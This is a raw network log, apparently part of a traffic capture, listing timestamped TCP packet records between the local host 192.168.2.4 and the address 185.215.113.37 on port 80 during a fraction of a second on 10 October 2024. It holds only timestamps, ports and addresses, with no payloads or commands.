Oct 10, 2024 18:23:19.642646074 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642663956 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642666101 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.642666101 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.642678976 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642729998 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.642729998 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.642899036 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642916918 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642927885 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642946005 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642956972 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642962933 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642968893 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642973900 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.642993927 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643006086 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643028021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643037081 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643057108 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643060923 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.643068075 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643085957 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643098116 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643114090 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643117905 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.643117905 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.643126965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643143892 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643177986 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.643177986 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.643557072 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643570900 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643610001 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.643692017 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643704891 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643728018 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643742085 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643758059 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643769979 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643771887 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.643771887 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.643786907 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643799067 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643815041 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643826962 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643845081 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643856049 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.643856049 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.643861055 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643877983 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.643894911 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.643894911 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.644062996 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.644243002 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.644253969 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.644279003 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.644289017 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.644296885 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.644305944 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.644323111 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.644325018 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.644335032 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.644351006 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.644361019 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.644377947 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.644381046 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.644381046 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.644391060 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.644406080 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.644418001 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.644433975 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.644443989 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.644443989 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.644445896 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.644463062 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.644486904 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.644486904 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.644578934 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.644649982 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.644659996 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.644676924 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.644690037 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.644706011 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.644757986 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.644757986 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.682512045 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.682535887 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.682549000 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.682630062 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.682630062 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.682634115 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.682643890 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.682662010 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.682677031 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.682742119 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.682742119 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.682769060 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.682777882 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.682796001 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.682805061 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.682815075 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.682827950 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.682842016 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.682858944 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.682866096 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.682866096 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.682972908 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.683012962 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.683126926 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.683300972 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.683350086 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.683361053 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.683429956 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.683470964 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.683470964 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.683491945 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.683505058 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.683644056 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.683650017 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.684997082 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.725521088 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.725545883 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.725619078 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.725622892 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.725635052 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.725656986 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.725671053 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.725696087 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.725696087 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.725759983 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.725769043 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.725783110 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.725800037 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.725812912 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.725821972 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.725831032 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.725843906 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.725861073 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.725868940 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.725868940 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.725956917 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.725964069 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.725967884 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.726011038 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.733067036 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733100891 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733115911 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733151913 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.733181953 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733194113 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733196974 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.733215094 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733305931 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733320951 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733362913 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733366013 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.733366013 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.733392954 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733433962 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733434916 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.733448982 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733464003 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733500957 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.733500957 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.733592987 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733608007 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733624935 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733639956 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733654022 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.733654022 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.733654976 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733671904 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733685017 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.733721018 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.733721018 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.733828068 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733841896 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733858109 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733870983 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733886957 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733901978 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.733906984 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.733906984 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.733949900 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.733949900 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.734107018 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734117985 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734137058 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734149933 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734164953 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734179974 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734189034 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.734189034 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.734196901 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734211922 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734225988 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734231949 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.734231949 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.734250069 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.734333992 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734379053 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734394073 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734416962 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.734417915 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.734498024 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734508991 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734528065 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734539986 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734564066 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.734564066 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.734628916 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734642029 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734721899 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734736919 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734740019 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.734750986 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734769106 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734781981 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734788895 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.734788895 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.734798908 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734800100 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.734812975 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734829903 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.734850883 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.734850883 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.735023022 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735033989 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735038996 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.735054016 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735090971 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.735090971 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.735194921 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735204935 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735222101 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735234976 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735250950 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735251904 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.735265017 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735281944 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735284090 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.735284090 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.735296011 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735311985 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735325098 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735326052 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.735326052 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.735342026 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735358000 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735361099 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.735361099 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.735372066 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735405922 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.735407114 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.735415936 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735748053 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735759020 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735775948 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735789061 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735805988 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735816002 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.735816002 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.735821009 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735845089 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.735866070 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.735866070 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.735987902 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.773175955 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.773209095 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.773224115 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.773248911 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.773261070 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.773302078 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.773302078 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.773308992 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.773323059 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.773365021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.773367882 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.773367882 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.773377895 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.773395061 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.773426056 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.773426056 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.773447990 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.773462057 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.773478031 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.773499012 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.774352074 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.774388075 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.774394035 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.774394035 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.774405003 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.774471998 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.774486065 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.774502993 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.774513960 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.774528980 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.774528980 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.774533033 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.774553061 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.774553061 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.775152922 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.816380978 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.816414118 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.816430092 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.816445112 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.816469908 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.816484928 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.816488028 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.816488028 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.816498995 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.816517115 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.816534996 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.816534996 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.816603899 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.816617966 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.816634893 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.816648006 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.816652060 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.816652060 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.816668034 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.816693068 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.816693068 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.816747904 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.820772886 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.823710918 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.823748112 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.823764086 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.823779106 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.823805094 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.823820114 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.823836088 CEST	80	49731	185.215.113.37	192.168.2.4
